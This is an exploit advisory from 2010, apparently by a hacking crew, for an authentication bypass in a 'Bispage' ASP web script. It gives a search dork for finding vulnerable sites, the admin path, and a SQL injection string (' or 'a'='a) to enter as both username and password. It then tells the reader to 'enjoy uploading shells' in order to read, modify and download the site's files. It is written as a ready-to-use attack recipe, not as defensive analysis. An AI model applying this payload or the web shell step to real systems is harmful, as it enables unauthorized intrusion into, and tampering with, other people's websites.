# Exploit Title: [ bispage Bypass Vulnerability]# Author: [SaMir-BonD] EGY@hotmail.com# Organization : TEAM-DZ# Formal sites : t00ls.org - h4kz.com# Software Link: [N/A]# Script's Language: [ASP]# Tested on: [Windows PHP/4.3.11os]# Dork :"Developed by Bispage.com"# CVE : [if exists]# Code : [exploit code]# Site page : bispage.com# Date: [23-2-2010]
*Hey dudes how are you doin' :D
*it's an easy bypass Vuln just see those steps :
________________________________________________
1) Victim.com/script/admin
2) User Between Brackets : (' or 'a'='a)
Pass Between Brackets : (' or 'a'='a)
3) Enjoy Uploading Shells :D ( upload ASP shell types to be able to read/modify/download Files)
#Greetz to:-----------
[TEAM-DZ: maxi32-noureddin-Skins-TheMoorish-Dr.Genius-IslamLee-M4st3r]
HcJ-Mr.Mero-Laqi@hajdin-Sh3ko-EGY-MaF!4-Trackoda-Dr.Mozo-TNT_HACKER-Elkatrez-DataFr4ck3r
& all those who know Samir-BonD(oXide)
---> h4kz.com & t00ls.org
Note : La Elah Ella ALLAH .. Muhammad Rasool ALLAH..